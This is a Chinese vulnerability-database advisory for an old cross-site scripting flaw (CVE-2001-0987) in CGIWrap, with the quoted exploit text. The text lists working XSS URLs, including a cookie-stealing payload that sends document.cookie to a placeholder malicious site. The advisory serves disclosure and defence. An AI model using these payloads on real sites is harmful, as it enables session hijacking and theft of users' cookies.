CGIWrap Javascrip执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106442 漏洞类型 跨站脚本
发布时间 2001-07-22 更新时间 2005-05-02
CVE编号 CVE-2001-0987 CNNVD-ID CNNVD-200107-167
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21023
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-167
|漏洞详情
CGIWrap3.7之前的版本存在跨站脚本攻击漏洞。远程攻击者可以通过将Javascript插入CGIWrap生成的错误信息在其他web客户端执行任意Javascript。
|漏洞EXP
source: http://www.securityfocus.com/bid/3081/info

CGIWrap is a free, open-source program for running CGI securely.

CGIWrap does not filter embedded scripting commands from user-supplied input. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser.

http://www.example.org/cgi-bin/cgiwrap/%3CS%3E
http://www.example.org/cgi-bin/cgiwrap/<S>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

JavaScript code will be executed:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

Stealing your Cookies issued by www.example.org, if any:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
|参考资料

来源:XF
名称:cgiwrap-cross-site-scripting(6886)
链接:http://xforce.iss.net/static/6886.php
来源:BID
名称:3084
链接:http://www.securityfocus.com/bid/3084
来源:cgiwrap.sourceforge.net
链接:http://cgiwrap.sourceforge.net/changes.html
来源:BUGTRAQ
名称:20010722Re:[cgiwrap-users]Re:SecurityholeinCGIWrap(cross-sitescriptingvulnerability)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html
来源:OSVDB
名称:1909
链接:http://www.osvdb.org/1909